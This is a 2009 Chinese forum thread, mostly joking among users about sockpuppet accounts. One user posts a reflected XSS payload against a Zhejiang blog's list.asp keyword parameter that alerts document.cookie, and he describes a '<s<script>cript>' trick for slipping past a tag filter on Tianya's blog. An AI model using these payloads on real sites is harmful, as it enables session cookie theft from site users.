刚找到的浙江博客x s s

马之甲 · 发表于 2009-6-15 20:04

原帖由 kucoolzhu 于 2009-6-15 20:02 发表

是邪恶帝。。。%@09

另外 BS下某人女马甲。。。

你说的是我么%@02 %@02 %@02

马之甲 · 发表于 2009-6-15 20:06

既然是马甲改一下性别更难发现嘛。。。%@08

kucoolzhu · 发表于 2009-6-15 20:07

<a href="list.asp?keyword=1234567&isbest=1">查看精华日志</a>
问题就在这里
只要在代码前面加个">把标签闭合就能XSS了
<a href="list.asp?keyword="><script>alert('XSS!!!\nby:XiaoZhu\n\ncookie='+document.cookie)</script>&isbest=1">查看精华日志</a>

kucoolzhu · 发表于 2009-6-15 20:08

原帖由 马之甲 于 2009-6-15 20:06 发表
既然是马甲改一下性别更难发现嘛。。。%@08

那既然是马甲。。为什么暴露的这么彻底呢。。。%@07

马之甲 · 发表于 2009-6-15 20:09

%@101 恩。。。表扬一下勤劳检测漏洞的孩子

我要人知道我是马甲但不知道我是谁
我记得此号注册时用了代理%@24

要不是现在没号用了天知道这是我的号

[ 本帖最后由马之甲于 2009-6-15 20:10 编辑 ]

unique伊维 · 发表于 2009-6-15 20:09

是邪恶猪%@58

kucoolzhu · 发表于 2009-6-15 20:10

原帖由 马之甲 于 2009-6-15 20:09 发表
恩。。。表扬一下勤劳检测漏洞的孩子

这个。。应该是物质上的%@10 %@10 %@10

kucoolzhu · 发表于 2009-6-15 20:11

原帖由 unique伊维 于 2009-6-15 20:09 发表
是邪恶猪%@58

是邪恶帝！！帝 d i di %@37

马之甲 · 发表于 2009-6-15 20:11

%@30 %@30 我精神支持。。。天涯物质上会支持的

unique伊维 · 发表于 2009-6-15 20:11

不过邪恶猪真的好强大%@03

kucoolzhu · 发表于 2009-6-15 20:12

原帖由 马之甲 于 2009-6-15 20:11 发表
%@30 %@30 我精神支持。。。天涯物质上会支持的

其实。。。肉体支持我也能接受的%@39

unique伊维 · 发表于 2009-6-15 20:13

邪恶。。。真邪恶。。。%@04

unique伊维 · 发表于 2009-6-15 20:14

猪~~~猪~~猪~~~猪```%@08

kucoolzhu · 发表于 2009-6-15 20:15

本来天涯博客也差不多X进去了。。标签过滤也被我用<s<script>cript>跳过了。。。到后来突然发现 < 被过滤了。。。。%@37

kucoolzhu · 发表于 2009-6-15 20:16

原帖由 unique伊维 于 2009-6-15 20:14 发表
猪~~~猪~~猪~~~猪```%@08

不得不说你的叫声很YD。。。。%@30

帐号		自动登录	找回密码
密码			会员注册